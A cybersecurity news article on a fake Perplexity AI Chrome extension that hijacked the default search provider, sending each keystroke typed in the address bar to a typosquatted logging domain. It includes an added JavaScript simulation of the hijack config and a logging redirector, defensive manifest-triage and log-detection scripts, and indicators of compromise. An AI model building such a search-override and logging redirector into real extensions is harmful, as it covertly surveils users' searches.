cognitive cybersecurity intelligence


Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals


A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users.

The extension, which went by the name “Search for perplexity ai,” was built to look and feel like a legitimate AI productivity tool, making it genuinely difficult for everyday users to detect anything suspicious.

The malicious extension targeted Chromium-based browsers and replaced the browser's default search provider the moment it was installed.

Every query a user submitted was silently routed through attacker-controlled infrastructure before landing on familiar search engines like Google or Bing, and because the extension also supplied the browser's search-suggestion endpoint, partial input left the machine on every keystroke, before Enter was ever pressed. To the user, everything appeared to work normally, which is exactly what made this threat so effective.

Analysts at Microsoft identified this extension and noted that its primary goal was search traffic interception and data collection.

Microsoft said in a report shared with Cyber Security News (CSN) that the operation could enable downstream misuse such as user profiling, targeted advertising, or other privacy violations depending on the intent of those running it.

After responsible disclosure, Google removed the extension from the Chrome Web Store. What set this threat apart from older search hijackers was that it needed no obvious client-side redirects to stay hidden.

Instead, the extension used browser-native Manifest V3 features, the chrome_settings_overrides search provider and the declarativeNetRequest API, so its interception looked like ordinary search traffic while it logged whatever the user typed into the address bar. One caveat a defender should keep in mind: the per-keystroke capture depends on the browser's search-suggestion feature, which is on by default in Chrome; with suggestions disabled, only submitted queries would have reached the attacker's server.

The extension also shipped with its own server-side code, an unusual detail that revealed the full scale of the operation.

That server code was designed to log all incoming requests, including full HTTP headers, user-agent strings, and IP addresses, confirming that data collection was deliberately and architecturally built in from the very start.

Fake Perplexity AI Extension

The extension registered itself as the browser's default search provider through the chrome_settings_overrides.search_provider key in its manifest, replacing the built-in search engine with its own typosquatted domain, perplexity-ai[.]online.

This domain closely resembled the legitimate perplexity[.]ai service, making the switch nearly invisible to anyone not actively checking their browser settings.

Landing page of perplexity-ai[.]online (Source – Microsoft)

Critically, the suggest_url field in that configuration also pointed to the attacker's domain. The browser fetches suggest_url on each keystroke to fill the suggestion dropdown, so every character typed into the address bar, before any search was submitted, was sent to attacker-controlled infrastructure.

The server at perplexity-ai[.]online would then log the full request before redirecting the browser to the real search engine, so the user saw the expected results and had no reason to suspect that the query had passed through a third party.
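The following is an added example, not code from Microsoft's report or from the extension itself. It models the mechanism described above: a chrome_settings_overrides search provider turns every omnibox keystroke into a request to suggest_url, and a logging redirector on that host records the request before bouncing the submitted search to a legitimate engine. The hostname, paths, user agent and client IP are constructed stand-ins, not the real indicators.

```javascript
// Added example: simulate omnibox traffic to a hijacked search provider and
// the attacker-side logging redirector. Everything here is constructed; the
// host search-proxy.example stands in for the real typosquatted domain.

// Constructed search_provider block shaped like the manifest key in the article.
// Chrome substitutes {searchTerms} with the current omnibox text.
const SEARCH_PROVIDER = {
  name: "Perplexity AI",
  keyword: "perplexity",
  search_url: "https://search-proxy.example/search?q={searchTerms}",
  suggest_url: "https://search-proxy.example/suggest?q={searchTerms}",
  is_default: true,
};

// Expand a Chrome search template the way the omnibox does for one input string.
function expandTemplate(template, text) {
  return template.replace("{searchTerms}", encodeURIComponent(text));
}

// Simulate the omnibox with search suggestions enabled: each keystroke fires a
// suggest_url request carrying the current prefix; Enter fires search_url.
function omniboxRequests(provider, typed) {
  const requests = [];
  for (let i = 1; i <= typed.length; i++) {
    requests.push({ kind: "suggest", url: expandTemplate(provider.suggest_url, typed.slice(0, i)) });
  }
  requests.push({ kind: "search", url: expandTemplate(provider.search_url, typed) });
  return requests;
}

// Simulated attacker-side redirector: records what the article says the real
// server logged (path, user agent, client IP) and bounces submitted searches to
// a legitimate engine so the victim sees normal results.
function makeRedirector(log) {
  return function handle(req) {
    const u = new URL(req.url);
    log.push({ path: u.pathname + u.search, ua: req.headers["user-agent"], ip: req.ip });
    const q = u.searchParams.get("q") || "";
    if (u.pathname === "/search") {
      return { status: 302, location: "https://www.google.com/search?q=" + encodeURIComponent(q) };
    }
    // Suggest endpoint: answer with an OpenSearch-style empty suggestion list
    // so the dropdown looks ordinary while the prefix has already been logged.
    return { status: 200, body: JSON.stringify([q, []]) };
  };
}

// Drive the simulation for one victim typing a query and pressing Enter.
// Returns the server-side log and the responses the browser received.
function simulateVictim(typed) {
  const log = [];
  const server = makeRedirector(log);
  const responses = omniboxRequests(SEARCH_PROVIDER, typed).map((r) =>
    server({ url: r.url, headers: { "user-agent": "Mozilla/5.0 (constructed)" }, ip: "198.51.100.7" })
  );
  return { log, responses };
}

if (typeof require !== "undefined" && require.main === module) {
  const { log, responses } = simulateVictim("payroll export");
  console.log(log.map((e) => e.path));
  console.log(responses[responses.length - 1]);
}
```

Run with node: the logged paths show the query arriving one character at a time, and the final response is the 302 to the real engine, which is the only part of the exchange the victim would ever notice.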

The extension requested three powerful network permissions: declarativeNetRequest, declarativeNetRequestFeedback, and declarativeNetRequestWithHostAccess.

Manifest.json configuration of the analyzed extension (Source – Microsoft)

Together, these allowed it to redirect traffic, observe which of its interception rules had fired, and apply rules to requests on hosts it held permissions for, including the attacker's domain, capabilities that go well beyond anything a legitimate AI search assistant would ever need. For anyone triaging similar extensions, one limit of the API is worth knowing: declarativeNetRequest rules can block, redirect and rewrite headers, but they cannot read request or response bodies, and what the active Perplexity ruleset actually did is defined by its rule file, which is not shown here.

Modular Design and Onboarding Deception

Upon installation, the extension opened an onboarding page hosted at extension.tilda[.]ws/perplexityai, presenting users with what looked like a perfectly normal product setup flow.

This technique is commonly used in extension-based adware campaigns to build user trust and reduce suspicion while silent browser changes take effect in the background.

Onboarding page launched by the extension after installation (Source – Microsoft)

The extension's rule set was modular, with separate rule files for Perplexity, Google, and Bing traffic registered under declarative_net_request.rule_resources, though only the Perplexity ruleset was marked enabled.

The disabled Google and Bing rulesets suggested the operator could expand the campaign's reach with minimal effort: flipping the enabled flag in a future update, or calling chrome.declarativeNetRequest.updateEnabledRulesets at runtime, would be enough to capture searches across more platforms.
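The manifest traits called out in the two sections above (a default search provider pointing at an off-brand host, a suggest_url on that host, the three declarativeNetRequest permissions, and dormant rulesets) can be checked statically. The block below is an added example, not Microsoft's analysis tooling; the manifest it inspects is constructed to mirror the described structure, and its domain, rule file names and extension ID are stand-ins rather than the real indicators.

```javascript
// Added example: static triage of an extension manifest.json for the
// search-hijack pattern described in the article. SAMPLE_MANIFEST is
// constructed; search-proxy.example stands in for the real typosquatted host.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Search for perplexity ai",
  version: "1.0",
  permissions: [
    "declarativeNetRequest",
    "declarativeNetRequestFeedback",
    "declarativeNetRequestWithHostAccess",
  ],
  host_permissions: ["https://search-proxy.example/*"],
  chrome_settings_overrides: {
    search_provider: {
      name: "Perplexity AI",
      keyword: "perplexity",
      search_url: "https://search-proxy.example/search?q={searchTerms}",
      suggest_url: "https://search-proxy.example/suggest?q={searchTerms}",
      is_default: true,
    },
  },
  declarative_net_request: {
    rule_resources: [
      { id: "perplexity", enabled: true, path: "rules/perplexity.json" },
      { id: "google", enabled: false, path: "rules/google.json" },
      { id: "bing", enabled: false, path: "rules/bing.json" },
    ],
  },
};

const DNR_PERMISSIONS = new Set([
  "declarativeNetRequest",
  "declarativeNetRequestFeedback",
  "declarativeNetRequestWithHostAccess",
]);

// Hostname of a Chrome search template. {searchTerms} only appears in the
// query string, so the URL parser handles the template as-is.
function hostOf(urlTemplate) {
  return new URL(urlTemplate).hostname;
}

// expectedHosts: hostnames the brand named in the extension legitimately uses.
// Returns a list of human-readable findings; an empty list means nothing flagged.
function triageManifest(manifest, expectedHosts) {
  const findings = [];
  const overrides = manifest.chrome_settings_overrides || {};
  const sp = overrides.search_provider;
  if (sp) {
    if (sp.is_default) findings.push("overrides default search provider");
    for (const key of ["search_url", "suggest_url"]) {
      if (!sp[key]) continue;
      const host = hostOf(sp[key]);
      if (!expectedHosts.includes(host)) {
        const note = key === "suggest_url" ? " (omnibox input leaks per keystroke)" : "";
        findings.push(`${key} points at unexpected host ${host}${note}`);
      }
    }
  }
  const dnr = (manifest.permissions || []).filter((p) => DNR_PERMISSIONS.has(p));
  if (dnr.length) findings.push(`declarativeNetRequest capabilities: ${dnr.join(", ")}`);
  const rules = (manifest.declarative_net_request || {}).rule_resources || [];
  const dormant = rules.filter((r) => r.enabled === false).map((r) => r.id);
  if (dormant.length) findings.push(`dormant rulesets that can be enabled later: ${dormant.join(", ")}`);
  return findings;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const f of triageManifest(SAMPLE_MANIFEST, ["www.perplexity.ai", "perplexity.ai"])) {
    console.log("-", f);
  }
}
```

The expected-host list is the reviewer's input: an extension that names a brand but routes search or suggestion traffic to a host that brand does not own is the core signal here, and the dormant-ruleset finding captures the "enable later" expansion path the article describes.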

To reduce exposure to this threat, Microsoft recommends that organizations restrict extension installs to an approved list and enforce enterprise browser policies in managed environments. In Chrome, for example, the ExtensionInstallAllowlist and ExtensionInstallBlocklist policies control which extensions can be installed, and the DefaultSearchProvider policies set the search and suggestion URLs centrally and take precedence over an extension's override.

Users should verify the publisher and domain of any extension before installing it, especially AI-themed tools, which have become a popular lure in social engineering campaigns. A quick check after install is the browser's search-engine settings page: if the default provider's URL is not the engine you expect, something has overridden it.

Organizations should also monitor for unauthorized changes to browser search settings and watch for outbound traffic to unfamiliar or intermediary domains. In this campaign the tell-tale pattern would be a burst of small GET requests to the intermediary domain whose query strings grow by one character at a time, followed by a redirect to a real search engine.
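The monitoring advice above can be turned into a concrete check over web-proxy logs. The block below is an added example, not Microsoft's guidance or tooling: it parses constructed log lines, ignores search traffic to an approved-engine allowlist, and reports any client sending query-bearing requests to some other host, counting how many of those queries form a growing-prefix chain, which is the signature per-keystroke suggestion leakage leaves behind. The log format, hosts, client addresses and allowlist are all assumptions for the example.

```javascript
// Added example: detect search-suggestion interception in proxy logs.
// Log format (constructed): "<timestamp> <client-ip> <method> <url>".
// search-proxy.example stands in for an unfamiliar intermediary domain.
const SAMPLE_LOG = `
2024-05-01T10:00:01Z 10.1.2.3 GET https://www.google.com/complete/search?q=weat
2024-05-01T10:00:02Z 10.1.2.3 GET https://www.google.com/search?q=weather
2024-05-01T10:05:00Z 10.1.2.9 GET https://search-proxy.example/suggest?q=p
2024-05-01T10:05:00Z 10.1.2.9 GET https://search-proxy.example/suggest?q=pa
2024-05-01T10:05:01Z 10.1.2.9 GET https://search-proxy.example/suggest?q=pay
2024-05-01T10:05:01Z 10.1.2.9 GET https://search-proxy.example/suggest?q=payr
2024-05-01T10:05:02Z 10.1.2.9 GET https://search-proxy.example/search?q=payroll
2024-05-01T10:05:02Z 10.1.2.9 GET https://www.google.com/search?q=payroll
2024-05-01T10:07:00Z 10.1.2.9 GET https://cdn.example/app.js
`.trim().split("\n");

// Engines whose search and suggest traffic is expected in this environment
// (assumed allowlist; tune to the organization's sanctioned providers).
const APPROVED_SEARCH_HOSTS = new Set([
  "www.google.com",
  "www.bing.com",
  "duckduckgo.com",
  "www.perplexity.ai",
]);

// Parse one log line into its parts plus the "q" query parameter, if any.
function parseLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  const u = new URL(url);
  return { ts, client, method, host: u.hostname, path: u.pathname, q: u.searchParams.get("q") };
}

// Group query-bearing requests to non-approved hosts by (client, host) and
// measure how many consecutive queries extend the previous one by a proper
// prefix relationship, i.e. the omnibox typing pattern.
function detectSearchInterception(lines) {
  const events = lines.map(parseLine).filter((e) => e.q !== null);
  const byClientHost = new Map();
  for (const e of events) {
    if (APPROVED_SEARCH_HOSTS.has(e.host)) continue;
    const key = `${e.client} ${e.host}`;
    if (!byClientHost.has(key)) byClientHost.set(key, []);
    byClientHost.get(key).push(e.q);
  }
  const alerts = [];
  for (const [key, queries] of byClientHost) {
    const [client, host] = key.split(" ");
    let chain = 0;
    for (let i = 1; i < queries.length; i++) {
      const prev = queries[i - 1];
      const cur = queries[i];
      if (cur.length > prev.length && cur.startsWith(prev)) chain++;
    }
    alerts.push({
      client,
      host,
      queries: queries.length,
      keystrokeChain: chain,
      finalQuery: queries[queries.length - 1],
    });
  }
  return alerts;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(detectSearchInterception(SAMPLE_LOG));
}
```

A single query to an unknown host can be benign; a high keystrokeChain relative to the number of queries means the host is receiving the user's input as it is typed, which legitimate intermediaries almost never need.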

Indicators of Compromise (IoCs):

Type          Indicator                            Description
Domain        perplexity-ai[.]online               Typosquatted domain used for search query interception and redirection
Extension ID  flkebkiofojicogddingbdmcmkpbplcd     Malicious Chromium browser extension identifier
URL           extension.tilda[.]ws/perplexityai    Installation onboarding page shown to users upon extension install

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.


The post Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals appeared first on Cyber Security News.

Source: cybersecuritynews.com
